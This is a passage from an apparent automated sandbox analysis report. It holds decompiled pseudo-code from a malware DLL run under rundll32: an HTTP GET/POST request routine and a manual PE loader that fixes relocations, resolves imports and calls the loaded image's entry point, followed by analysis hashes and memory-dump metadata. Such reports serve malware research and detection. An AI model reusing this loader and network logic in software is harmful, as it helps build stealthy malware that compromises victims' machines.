                                                                                                                                                                          				intOrPtr _t119;
                                                                                                                                                                          				intOrPtr _t126;
                                                                                                                                                                          				intOrPtr _t130;
                                                                                                                                                                          				intOrPtr _t134;
                                                                                                                                                                          				intOrPtr _t136;
                                                                                                                                                                          				intOrPtr _t138;
                                                                                                                                                                          				char _t142;
                                                                                                                                                                          				intOrPtr _t144;
                                                                                                                                                                          				void* _t154;
                                                                                                                                                                          				signed int _t156;
                                                                                                                                                                          				intOrPtr _t162;
                                                                                                                                                                          				intOrPtr _t167;
                                                                                                                                                                          				signed int _t168;
                                                                                                                                                                          				signed int _t176;
                                                                                                                                                                          				char _t182;
                                                                                                                                                                          				signed int _t183;
                                                                                                                                                                          				void* _t184;
                                                                                                                                                                          				signed int _t186;
                                                                                                                                                                          				signed int _t187;
                                                                                                                                                                          				signed int _t188;
                                                                                                                                                                          				char _t189;
                                                                                                                                                                          				void* _t190;
                                                                                                                                                                          				void* _t191;
                                                                                                                                                                          				intOrPtr* _t193;
                                                                                                                                                                          
                                                                                                                                                                          				_t157 = __ecx;
                                                                                                                                                                          				_v40 = _v40 & 0x00000000;
                                                                                                                                                                          				_t184 = __edx;
                                                                                                                                                                          				_v24 = __ecx;
                                                                                                                                                                          				_v32 = 4;
                                                                                                                                                                          				_v36 = 1;
                                                                                                                                                                          				memset( &_v396, 0, 0x100);
                                                                                                                                                                          				memset( &_v652, 0, 0x100);
                                                                                                                                                                          				_t193 = _t191 + 0x18;
                                                                                                                                                                          				_v64 = E10009192(_t157, 0x503);
                                                                                                                                                                          				 *_t193 = 0x14ee;
                                                                                                                                                                          				_v60 = E10009192(_t157);
                                                                                                                                                                          				 *_t193 = 0x18a;
                                                                                                                                                                          				_v56 = E10009192(_t157);
                                                                                                                                                                          				 *_t193 = 0x128f;
                                                                                                                                                                          				_v52 = E10009192(_t157);
                                                                                                                                                                          				 *_t193 = 0xe8b;
                                                                                                                                                                          				_t91 = E10009192(_t157);
                                                                                                                                                                          				_v44 = _v44 & 0;
                                                                                                                                                                          				_t182 = 0x3c;
                                                                                                                                                                          				_v48 = _t91;
                                                                                                                                                                          				E1000936A( &_v124, 0, 0x100);
                                                                                                                                                                          				_v116 = 0x10;
                                                                                                                                                                          				_v120 =  &_v140;
                                                                                                                                                                          				_v124 = _t182;
                                                                                                                                                                          				_v108 =  &_v396;
                                                                                                                                                                          				_v104 = 0x100;
                                                                                                                                                                          				_v80 =  &_v652;
                                                                                                                                                                          				_push( &_v124);
                                                                                                                                                                          				_push(0);
                                                                                                                                                                          				_v76 = 0x100;
                                                                                                                                                                          				_push(E1000CF09(_t184));
                                                                                                                                                                          				_t99 =  *0x10020fb8; // 0x0
                                                                                                                                                                          				_push(_t184);
                                                                                                                                                                          				if( *((intOrPtr*)(_t99 + 0x28))() != 0) {
                                                                                                                                                                          					_t176 = 0;
                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                          					_v28 = 0;
                                                                                                                                                                          					do {
                                                                                                                                                                          						_t101 =  *0x10020fb8; // 0x0
                                                                                                                                                                          						_v12 = 0x8404f700;
                                                                                                                                                                          						_t183 =  *_t101( *0x100210cc,  *((intOrPtr*)(_t190 + _t176 * 4 - 0x24)), 0, 0, 0);
                                                                                                                                                                          						__eflags = _t183;
                                                                                                                                                                          						if(_t183 != 0) {
                                                                                                                                                                          							E1000F0B7(_t183);
                                                                                                                                                                          							_t106 =  *0x10020fb8; // 0x0
                                                                                                                                                                          							_t107 =  *((intOrPtr*)(_t106 + 0x1c))(_t183,  &_v396, _v100, 0, 0, 3, 0, 0);
                                                                                                                                                                          							__eflags = _a24;
                                                                                                                                                                          							_t156 = _t107;
                                                                                                                                                                          							if(_a24 != 0) {
                                                                                                                                                                          								E1000C3B5(_a24);
                                                                                                                                                                          							}
                                                                                                                                                                          							__eflags = _t156;
                                                                                                                                                                          							if(_t156 != 0) {
                                                                                                                                                                          								__eflags = _v112 - 4;
                                                                                                                                                                          								_t162 = 0x8484f700;
                                                                                                                                                                          								if(_v112 != 4) {
                                                                                                                                                                          									_t162 = _v12;
                                                                                                                                                                          								}
                                                                                                                                                                          								__eflags = _v24 - 2;
                                                                                                                                                                          								_t108 = 0x1001df14;
                                                                                                                                                                          								if(_v24 != 2) {
                                                                                                                                                                          									_t108 = 0x1001df1c;
                                                                                                                                                                          								}
                                                                                                                                                                          								_t164 =  &_v652;
                                                                                                                                                                          								_t109 =  *0x10020fb8; // 0x0
                                                                                                                                                                          								_t110 =  *((intOrPtr*)(_t109 + 0x20))(_t156, _t108,  &_v652, 0, 0,  &_v64, _t162, 0);
                                                                                                                                                                          								__eflags = _a24;
                                                                                                                                                                          								_t186 = _t110;
                                                                                                                                                                          								_v8 = _t186;
                                                                                                                                                                          								if(_a24 != 0) {
                                                                                                                                                                          									_t164 = _a24;
                                                                                                                                                                          									E1000C3B5(_a24);
                                                                                                                                                                          								}
                                                                                                                                                                          								__eflags = _t186;
                                                                                                                                                                          								if(_t186 != 0) {
                                                                                                                                                                          									__eflags = _v112 - 4;
                                                                                                                                                                          									if(_v112 == 4) {
                                                                                                                                                                          										_t164 = _t186;
                                                                                                                                                                          										E1000F065(_t186);
                                                                                                                                                                          									}
                                                                                                                                                                          									__eflags = _v24 - 2;
                                                                                                                                                                          									if(_v24 != 2) {
                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                          										_t112 =  *0x10020fb8; // 0x0
                                                                                                                                                                          										_v12 =  *((intOrPtr*)(_t112 + 0x24))(_t186, 0, 0, 0, 0);
                                                                                                                                                                          									} else {
                                                                                                                                                                          										_t142 = E10009192(_t164, 0xfb3);
                                                                                                                                                                          										_t189 = _t142;
                                                                                                                                                                          										_v16 = _t189;
                                                                                                                                                                          										_t144 =  *0x10020fb8; // 0x0
                                                                                                                                                                          										_t186 = _v8;
                                                                                                                                                                          										_v12 =  *((intOrPtr*)(_t144 + 0x24))(_t186, _t189, E1000CF09(_t189), _a4, _a8);
                                                                                                                                                                          										E10009E14( &_v16);
                                                                                                                                                                          									}
                                                                                                                                                                          									__eflags = _a24;
                                                                                                                                                                          									if(_a24 != 0) {
                                                                                                                                                                          										E1000C3B5(_a24);
                                                                                                                                                                          									}
                                                                                                                                                                          									__eflags = _v12;
                                                                                                                                                                          									if(_v12 != 0) {
                                                                                                                                                                          										L31:
                                                                                                                                                                          										_t114 = 8;
                                                                                                                                                                          										_v32 = _t114;
                                                                                                                                                                          										_v20 = 0;
                                                                                                                                                                          										_v16 = 0;
                                                                                                                                                                          										E1000936A( &_v20, 0, _t114);
                                                                                                                                                                          										_t119 =  *0x10020fb8; // 0x0
                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_t119 + 0xc))(_t186, 0x13,  &_v20,  &_v32, 0);
                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                          											_t187 = E1000C2C8( &_v20, __eflags);
                                                                                                                                                                          											__eflags = _t187 - 0xc8;
                                                                                                                                                                          											if(_t187 == 0xc8) {
                                                                                                                                                                          												 *_a20 = _v8;
                                                                                                                                                                          												 *_a12 = _t183;
                                                                                                                                                                          												 *_a16 = _t156;
                                                                                                                                                                          												__eflags = 0;
                                                                                                                                                                          												return 0;
                                                                                                                                                                          											}
                                                                                                                                                                          											_t188 =  ~_t187;
                                                                                                                                                                          											L35:
                                                                                                                                                                          											_t126 =  *0x10020fb8; // 0x0
                                                                                                                                                                          											 *((intOrPtr*)(_t126 + 8))(_v8);
                                                                                                                                                                          											L36:
                                                                                                                                                                          											__eflags = _t156;
                                                                                                                                                                          											if(_t156 != 0) {
                                                                                                                                                                          												_t130 =  *0x10020fb8; // 0x0
                                                                                                                                                                          												 *((intOrPtr*)(_t130 + 8))(_t156);
                                                                                                                                                                          											}
                                                                                                                                                                          											__eflags = _t183;
                                                                                                                                                                          											if(_t183 != 0) {
                                                                                                                                                                          												_t167 =  *0x10020fb8; // 0x0
                                                                                                                                                                          												 *((intOrPtr*)(_t167 + 8))(_t183);
                                                                                                                                                                          											}
                                                                                                                                                                          											return _t188;
                                                                                                                                                                          										}
                                                                                                                                                                          										GetLastError();
                                                                                                                                                                          										_t188 = 0xfffffff8;
                                                                                                                                                                          										goto L35;
                                                                                                                                                                          									} else {
                                                                                                                                                                          										GetLastError();
                                                                                                                                                                          										_t134 =  *0x10020fb8; // 0x0
                                                                                                                                                                          										 *((intOrPtr*)(_t134 + 8))(_t186);
                                                                                                                                                                          										_t186 = 0;
                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                          										goto L26;
                                                                                                                                                                          									}
                                                                                                                                                                          								} else {
                                                                                                                                                                          									GetLastError();
                                                                                                                                                                          									L26:
                                                                                                                                                                          									_t136 =  *0x10020fb8; // 0x0
                                                                                                                                                                          									 *((intOrPtr*)(_t136 + 8))(_t156);
                                                                                                                                                                          									_t156 = 0;
                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                          									goto L27;
                                                                                                                                                                          								}
                                                                                                                                                                          							} else {
                                                                                                                                                                          								GetLastError();
                                                                                                                                                                          								L27:
                                                                                                                                                                          								_t138 =  *0x10020fb8; // 0x0
                                                                                                                                                                          								 *((intOrPtr*)(_t138 + 8))(_t183);
                                                                                                                                                                          								_t183 = 0;
                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                          								goto L28;
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          						GetLastError();
                                                                                                                                                                          						L28:
                                                                                                                                                                          						_t168 = _t186;
                                                                                                                                                                          						_t176 = _v28 + 1;
                                                                                                                                                                          						_v28 = _t176;
                                                                                                                                                                          						__eflags = _t176 - 2;
                                                                                                                                                                          					} while (_t176 < 2);
                                                                                                                                                                          					_v8 = _t186;
                                                                                                                                                                          					__eflags = _t168;
                                                                                                                                                                          					if(_t168 != 0) {
                                                                                                                                                                          						goto L31;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t188 = 0xfffffffe;
                                                                                                                                                                          					goto L36;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t154 = 0xfffffffc;
                                                                                                                                                                          				return _t154;
                                                                                                                                                                          			}
































































                                                                                                                                                                          0x1000f11f
                                                                                                                                                                          0x1000f128
                                                                                                                                                                          0x1000f135
                                                                                                                                                                          0x1000f137
                                                                                                                                                                          0x1000f13f
                                                                                                                                                                          0x1000f148
                                                                                                                                                                          0x1000f154
                                                                                                                                                                          0x1000f165
                                                                                                                                                                          0x1000f16a
                                                                                                                                                                          0x1000f177
                                                                                                                                                                          0x1000f17a
                                                                                                                                                                          0x1000f186
                                                                                                                                                                          0x1000f189
                                                                                                                                                                          0x1000f195
                                                                                                                                                                          0x1000f198
                                                                                                                                                                          0x1000f1a4
                                                                                                                                                                          0x1000f1a7
                                                                                                                                                                          0x1000f1ae
                                                                                                                                                                          0x1000f1b3
                                                                                                                                                                          0x1000f1b9
                                                                                                                                                                          0x1000f1bb
                                                                                                                                                                          0x1000f1c3
                                                                                                                                                                          0x1000f1ce
                                                                                                                                                                          0x1000f1d5
                                                                                                                                                                          0x1000f1e1
                                                                                                                                                                          0x1000f1e4
                                                                                                                                                                          0x1000f1f2
                                                                                                                                                                          0x1000f1f5
                                                                                                                                                                          0x1000f1fb
                                                                                                                                                                          0x1000f1fc
                                                                                                                                                                          0x1000f1fe
                                                                                                                                                                          0x1000f207
                                                                                                                                                                          0x1000f208
                                                                                                                                                                          0x1000f20d
                                                                                                                                                                          0x1000f213
                                                                                                                                                                          0x1000f21d
                                                                                                                                                                          0x1000f21d
                                                                                                                                                                          0x1000f21f
                                                                                                                                                                          0x1000f224
                                                                                                                                                                          0x1000f224
                                                                                                                                                                          0x1000f233
                                                                                                                                                                          0x1000f242
                                                                                                                                                                          0x1000f244
                                                                                                                                                                          0x1000f246
                                                                                                                                                                          0x1000f255
                                                                                                                                                                          0x1000f26c
                                                                                                                                                                          0x1000f272
                                                                                                                                                                          0x1000f275
                                                                                                                                                                          0x1000f279
                                                                                                                                                                          0x1000f27b
                                                                                                                                                                          0x1000f280
                                                                                                                                                                          0x1000f280
                                                                                                                                                                          0x1000f285
                                                                                                                                                                          0x1000f287
                                                                                                                                                                          0x1000f294
                                                                                                                                                                          0x1000f298
                                                                                                                                                                          0x1000f29d
                                                                                                                                                                          0x1000f29f
                                                                                                                                                                          0x1000f29f
                                                                                                                                                                          0x1000f2a2
                                                                                                                                                                          0x1000f2a6
                                                                                                                                                                          0x1000f2ab
                                                                                                                                                                          0x1000f2ad
                                                                                                                                                                          0x1000f2ad
                                                                                                                                                                          0x1000f2bc
                                                                                                                                                                          0x1000f2c4
                                                                                                                                                                          0x1000f2ca
                                                                                                                                                                          0x1000f2cd
                                                                                                                                                                          0x1000f2d1
                                                                                                                                                                          0x1000f2d3
                                                                                                                                                                          0x1000f2d6
                                                                                                                                                                          0x1000f2d8
                                                                                                                                                                          0x1000f2db
                                                                                                                                                                          0x1000f2db
                                                                                                                                                                          0x1000f2e0
                                                                                                                                                                          0x1000f2e2
                                                                                                                                                                          0x1000f2ef
                                                                                                                                                                          0x1000f2f3
                                                                                                                                                                          0x1000f2f5
                                                                                                                                                                          0x1000f2f7
                                                                                                                                                                          0x1000f2f7
                                                                                                                                                                          0x1000f2fc
                                                                                                                                                                          0x1000f300
                                                                                                                                                                          0x1000f33c
                                                                                                                                                                          0x1000f342
                                                                                                                                                                          0x1000f34b
                                                                                                                                                                          0x1000f302
                                                                                                                                                                          0x1000f307
                                                                                                                                                                          0x1000f310
                                                                                                                                                                          0x1000f315
                                                                                                                                                                          0x1000f320
                                                                                                                                                                          0x1000f326
                                                                                                                                                                          0x1000f32d
                                                                                                                                                                          0x1000f334
                                                                                                                                                                          0x1000f339
                                                                                                                                                                          0x1000f34e
                                                                                                                                                                          0x1000f352
                                                                                                                                                                          0x1000f357
                                                                                                                                                                          0x1000f357
                                                                                                                                                                          0x1000f35c
                                                                                                                                                                          0x1000f360
                                                                                                                                                                          0x1000f3a9
                                                                                                                                                                          0x1000f3ab
                                                                                                                                                                          0x1000f3ae
                                                                                                                                                                          0x1000f3b6
                                                                                                                                                                          0x1000f3ba
                                                                                                                                                                          0x1000f3bd
                                                                                                                                                                          0x1000f3cf
                                                                                                                                                                          0x1000f3da
                                                                                                                                                                          0x1000f3dc
                                                                                                                                                                          0x1000f3f1
                                                                                                                                                                          0x1000f3f3
                                                                                                                                                                          0x1000f3f9
                                                                                                                                                                          0x1000f42e
                                                                                                                                                                          0x1000f433
                                                                                                                                                                          0x1000f438
                                                                                                                                                                          0x1000f43a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000f43a
                                                                                                                                                                          0x1000f3fb
                                                                                                                                                                          0x1000f3fd
                                                                                                                                                                          0x1000f3fd
                                                                                                                                                                          0x1000f406
                                                                                                                                                                          0x1000f409
                                                                                                                                                                          0x1000f409
                                                                                                                                                                          0x1000f40b
                                                                                                                                                                          0x1000f40d
                                                                                                                                                                          0x1000f413
                                                                                                                                                                          0x1000f413
                                                                                                                                                                          0x1000f416
                                                                                                                                                                          0x1000f418
                                                                                                                                                                          0x1000f41a
                                                                                                                                                                          0x1000f421
                                                                                                                                                                          0x1000f421
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000f424
                                                                                                                                                                          0x1000f3de
                                                                                                                                                                          0x1000f3e6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000f362
                                                                                                                                                                          0x1000f362
                                                                                                                                                                          0x1000f368
                                                                                                                                                                          0x1000f36e
                                                                                                                                                                          0x1000f371
                                                                                                                                                                          0x1000f371
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000f371
                                                                                                                                                                          0x1000f2e4
                                                                                                                                                                          0x1000f2e4
                                                                                                                                                                          0x1000f373
                                                                                                                                                                          0x1000f373
                                                                                                                                                                          0x1000f379
                                                                                                                                                                          0x1000f37c
                                                                                                                                                                          0x1000f37c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000f37c
                                                                                                                                                                          0x1000f289
                                                                                                                                                                          0x1000f289
                                                                                                                                                                          0x1000f37e
                                                                                                                                                                          0x1000f37e
                                                                                                                                                                          0x1000f384
                                                                                                                                                                          0x1000f387
                                                                                                                                                                          0x1000f387
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000f387
                                                                                                                                                                          0x1000f287
                                                                                                                                                                          0x1000f248
                                                                                                                                                                          0x1000f389
                                                                                                                                                                          0x1000f38c
                                                                                                                                                                          0x1000f38e
                                                                                                                                                                          0x1000f391
                                                                                                                                                                          0x1000f394
                                                                                                                                                                          0x1000f394
                                                                                                                                                                          0x1000f39d
                                                                                                                                                                          0x1000f3a0
                                                                                                                                                                          0x1000f3a2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000f3a6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000f3a6
                                                                                                                                                                          0x1000f217
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 1000F154
                                                                                                                                                                          • memset.MSVCRT ref: 1000F165
                                                                                                                                                                            • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000F248
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$ErrorLast
                                                                                                                                                                          • String ID: GET$POST
                                                                                                                                                                          • API String ID: 2570506013-3192705859
                                                                                                                                                                          • Opcode ID: 3fe8ed42323438c95cbd423daaf787408dc2ec82612b357b8314e3646d689d1a
                                                                                                                                                                          • Instruction ID: c87b9fb0a9fafe7a4f3f35a8b55887b992dd21be3c4982e5565fa784aea7ae63
                                                                                                                                                                          • Opcode Fuzzy Hash: 3fe8ed42323438c95cbd423daaf787408dc2ec82612b357b8314e3646d689d1a
                                                                                                                                                                          • Instruction Fuzzy Hash: B8A19EB5900219AFEB50DFA4CC84AEEB7F9EF48350F208029F505E7695DB749A41CF50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _snprintfqsort
                                                                                                                                                                          • String ID: %I64d$false$null$true
                                                                                                                                                                          • API String ID: 756996078-4285102228
                                                                                                                                                                          • Opcode ID: 47a3a100da203642488b1b01a907a1b11e44da986f7d1736df3d4d16a275fc55
                                                                                                                                                                          • Instruction ID: 99e7c3b995d16f303a99f6db7a251a1efad8bffc3f45fe7ed278e0bcb9f1f9da
                                                                                                                                                                          • Opcode Fuzzy Hash: 47a3a100da203642488b1b01a907a1b11e44da986f7d1736df3d4d16a275fc55
                                                                                                                                                                          • Instruction Fuzzy Hash: 54E15BB190024ABBDF15DFA4DC42EEF3BA9EF45384F108019FE149A141E735DAE19BA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 28%
                                                                                                                                                                          			E1001472A(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                                                                                          				signed int _v5;
                                                                                                                                                                          				signed short _v12;
                                                                                                                                                                          				intOrPtr* _v16;
                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                          				signed int* _v24;
                                                                                                                                                                          				unsigned int _v28;
                                                                                                                                                                          				signed short* _v32;
                                                                                                                                                                          				struct HINSTANCE__* _v36;
                                                                                                                                                                          				signed int _v40;
                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                          				intOrPtr* _v48;
                                                                                                                                                                          				signed short* _v52;
                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                          				unsigned int _v60;
                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                          				_Unknown_base(*)()* _v68;
                                                                                                                                                                          				signed int _v72;
                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                          				unsigned int _v88;
                                                                                                                                                                          				intOrPtr _v92;
                                                                                                                                                                          				signed int _v96;
                                                                                                                                                                          				intOrPtr _v100;
                                                                                                                                                                          				intOrPtr _v104;
                                                                                                                                                                          				intOrPtr _v108;
                                                                                                                                                                          				intOrPtr _v112;
                                                                                                                                                                          				CHAR* _v116;
                                                                                                                                                                          				signed int _v120;
                                                                                                                                                                          				intOrPtr _v124;
                                                                                                                                                                          				signed int _v128;
                                                                                                                                                                          				signed int _v132;
                                                                                                                                                                          				signed int _t220;
                                                                                                                                                                          				signed int _t237;
                                                                                                                                                                          				void* _t277;
                                                                                                                                                                          				signed int _t282;
                                                                                                                                                                          				signed int _t284;
                                                                                                                                                                          				intOrPtr _t324;
                                                                                                                                                                          
                                                                                                                                                                          				_v44 = _v44 & 0x00000000;
                                                                                                                                                                          				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                          				_v20 = _v84;
                                                                                                                                                                          				_t324 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                                                                                                                          				_v64 = _t324;
                                                                                                                                                                          				if(_t324 == 0) {
                                                                                                                                                                          					L13:
                                                                                                                                                                          					while(0 != 0) {
                                                                                                                                                                          					}
                                                                                                                                                                          					_push(8);
                                                                                                                                                                          					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                                                                                                                          						L35:
                                                                                                                                                                          						if(_a16 == 0) {
                                                                                                                                                                          							L54:
                                                                                                                                                                          							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                                                                                                                          							while(0 != 0) {
                                                                                                                                                                          							}
                                                                                                                                                                          							if(_a12 != 0) {
                                                                                                                                                                          								 *_a12 = _v80;
                                                                                                                                                                          							}
                                                                                                                                                                          							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                                                                                                                          							E100144D8(GetCurrentProcess(),  *0x10020fe4, _t203, _a4, _a4);
                                                                                                                                                                          							_v124 = _v80(_a4, 1, _a8);
                                                                                                                                                                          							while(0 != 0) {
                                                                                                                                                                          							}
                                                                                                                                                                          							if(_v124 != 0) {
                                                                                                                                                                          								if(_v44 == 0) {
                                                                                                                                                                          									L77:
                                                                                                                                                                          									return 1;
                                                                                                                                                                          								}
                                                                                                                                                                          								if(_a20 != 1) {
                                                                                                                                                                          									if(_a20 != 2) {
                                                                                                                                                                          										L75:
                                                                                                                                                                          										while(0 != 0) {
                                                                                                                                                                          										}
                                                                                                                                                                          										goto L77;
                                                                                                                                                                          									}
                                                                                                                                                                          									while(0 != 0) {
                                                                                                                                                                          									}
                                                                                                                                                                          									_v132 = _v44;
                                                                                                                                                                          									goto L75;
                                                                                                                                                                          								}
                                                                                                                                                                          								while(0 != 0) {
                                                                                                                                                                          								}
                                                                                                                                                                          								_v44();
                                                                                                                                                                          								goto L75;
                                                                                                                                                                          							}
                                                                                                                                                                          							while(0 != 0) {
                                                                                                                                                                          							}
                                                                                                                                                                          							return 0;
                                                                                                                                                                          						}
                                                                                                                                                                          						while(0 != 0) {
                                                                                                                                                                          						}
                                                                                                                                                                          						_push(8);
                                                                                                                                                                          						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                                                                                                                          							goto L54;
                                                                                                                                                                          						}
                                                                                                                                                                          						_v128 = 0x80000000;
                                                                                                                                                                          						_t220 = 8;
                                                                                                                                                                          						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t220 * 0));
                                                                                                                                                                          						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                                                                                                                          						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                                                                                                                          						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                                                                                                                          						while(0 != 0) {
                                                                                                                                                                          						}
                                                                                                                                                                          						_v40 = _v40 & 0x00000000;
                                                                                                                                                                          						while(_v40 < _v104) {
                                                                                                                                                                          							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                                                                                                                          							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                                                                                                                          							if(lstrcmpA(_v116, _a16) != 0) {
                                                                                                                                                                          								_v40 = _v40 + 1;
                                                                                                                                                                          								continue;
                                                                                                                                                                          							}
                                                                                                                                                                          							while(0 != 0) {
                                                                                                                                                                          							}
                                                                                                                                                                          							_v44 = _v120;
                                                                                                                                                                          							break;
                                                                                                                                                                          						}
                                                                                                                                                                          						if(_v44 != 0) {
                                                                                                                                                                          							goto L54;
                                                                                                                                                                          						}
                                                                                                                                                                          						while(0 != 0) {
                                                                                                                                                                          						}
                                                                                                                                                                          						return 0xffffffff;
                                                                                                                                                                          					}
                                                                                                                                                                          					_v96 = 0x80000000;
                                                                                                                                                                          					_t237 = 8;
                                                                                                                                                                          					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t237 << 0) + 0x78));
                                                                                                                                                                          					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                                                                                          						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                          						if(_v36 == 0) {
                                                                                                                                                                          							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                          						}
                                                                                                                                                                          						if(_v36 != 0) {
                                                                                                                                                                          							if( *_v16 == 0) {
                                                                                                                                                                          								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								_v24 =  *_v16 + _a4;
                                                                                                                                                                          							}
                                                                                                                                                                          							_v72 = _v72 & 0x00000000;
                                                                                                                                                                          							while( *_v24 != 0) {
                                                                                                                                                                          								if(( *_v24 & _v96) == 0) {
                                                                                                                                                                          									_v100 =  *_v24 + _a4;
                                                                                                                                                                          									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                                                                                                                          								} else {
                                                                                                                                                                          									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                                                                                                                          								}
                                                                                                                                                                          								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                                                                                          									 *_v24 = _v68;
                                                                                                                                                                          								} else {
                                                                                                                                                                          									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                                                                                                                          								}
                                                                                                                                                                          								_v24 =  &(_v24[1]);
                                                                                                                                                                          								_v72 = _v72 + 4;
                                                                                                                                                                          							}
                                                                                                                                                                          							_v16 = _v16 + 0x14;
                                                                                                                                                                          							continue;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							_t277 = 0xfffffffd;
                                                                                                                                                                          							return _t277;
                                                                                                                                                                          						}
                                                                                                                                                                          					}
                                                                                                                                                                          					goto L35;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t282 = 8;
                                                                                                                                                                          				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t282 * 5));
                                                                                                                                                                          				_t284 = 8;
                                                                                                                                                                          				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t284 * 5));
                                                                                                                                                                          				while(0 != 0) {
                                                                                                                                                                          				}
                                                                                                                                                                          				while(_v56 > 0) {
                                                                                                                                                                          					_v28 = _v52[2];
                                                                                                                                                                          					_v56 = _v56 - _v28;
                                                                                                                                                                          					_v28 = _v28 - 8;
                                                                                                                                                                          					_v28 = _v28 >> 1;
                                                                                                                                                                          					_v32 =  &(_v52[4]);
                                                                                                                                                                          					_v92 = _a4 +  *_v52;
                                                                                                                                                                          					_v60 = _v28;
                                                                                                                                                                          					while(1) {
                                                                                                                                                                          						_v88 = _v60;
                                                                                                                                                                          						_v60 = _v60 - 1;
                                                                                                                                                                          						if(_v88 == 0) {
                                                                                                                                                                          							break;
                                                                                                                                                                          						}
                                                                                                                                                                          						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                                                                                          						_v12 =  *_v32 & 0xfff;
                                                                                                                                                                          						_v48 = (_v12 & 0x0000ffff) + _v92;
